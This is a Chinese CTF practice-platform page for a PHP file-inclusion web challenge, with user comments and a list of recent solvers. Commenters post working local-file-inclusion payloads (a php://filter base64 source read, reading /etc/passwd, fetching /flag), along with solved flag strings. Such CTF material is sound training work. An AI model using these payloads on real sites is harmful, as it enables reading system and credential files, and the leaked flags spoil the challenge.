文件包含WEB 未解决

分数: 20 金币: 2
题目作者: harry
一  血: 不会CTF的麻风
一血奖励: 1金币
解  决: 13313
提  示:
描  述:
flag{}
评论
bkyhack123 2年前

<?php error_reporting(0); if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';} $file=$_GET['file']; if(strstr($file,"../")||stristr

回复 0

fonddream 2年前

http://114.67.175.224:18948/index.php?file=php://filter/convert.base64-encode/resource=index.php 得到一串base64编码,解码之后发现是源码,直接有falg

回复 1

大哥大 2年前

http://114.67.175.224:11806/index.php?file=/flag Copy this url then you can get the flag.

回复 2

nicchanggh 2年前

flag{e92c0ec08be5fc7e0bd706e697e366fd}

回复 0

chushou 2年前

flag{ebfea7aca0bd16bb5819c678090ff026}

回复 0

107zsm 2年前

打开环境看到有一个超链接click me? no,点进去变成了index.php,并且URL末尾多了一句index.php?file=show.php,看到*.php?file就能猜到是伪协议读取文件了,把URL改成index.php?file=/etc/passwd,爆出来的数据也能验证,而且没过滤,直接index.php?file=/flag

回复 12

小夫 2年前

file=/flag

回复 0

rightstar 2年前

flag{a1ad1a8522261e6b9abf21e9bd6ef675}

回复 0

sibeil 2年前

flag{b23328bbf165641292d9871be279459a}

回复 0

wxy1343 2年前

flag{a15320afe0f7ad00fb16135d7456a9e1}

回复 0

WriteUp

image
harry

2 金币

评分(11)

解题动态

1302074808 攻破了该题 12小时前
1166 攻破了该题 12小时前
18995826257 攻破了该题 23小时前
LLLEI 攻破了该题 23小时前
qq111111 攻破了该题 1天前
wxj 攻破了该题 1天前
红罐凉茶爱拿铁 攻破了该题 1天前
liffer 攻破了该题 2天前
treesky 攻破了该题 2天前
舰长 攻破了该题 2天前
小熊 攻破了该题 2天前
buuku 攻破了该题 2天前
千洛十安 攻破了该题 2天前
aaa30950 攻破了该题 2天前
我是新手* 攻破了该题 2天前
Tychema 攻破了该题 2天前
网安80分 攻破了该题 2天前
gleam 攻破了该题 2天前
zx666 攻破了该题 2天前
codef 攻破了该题 2天前
问题反馈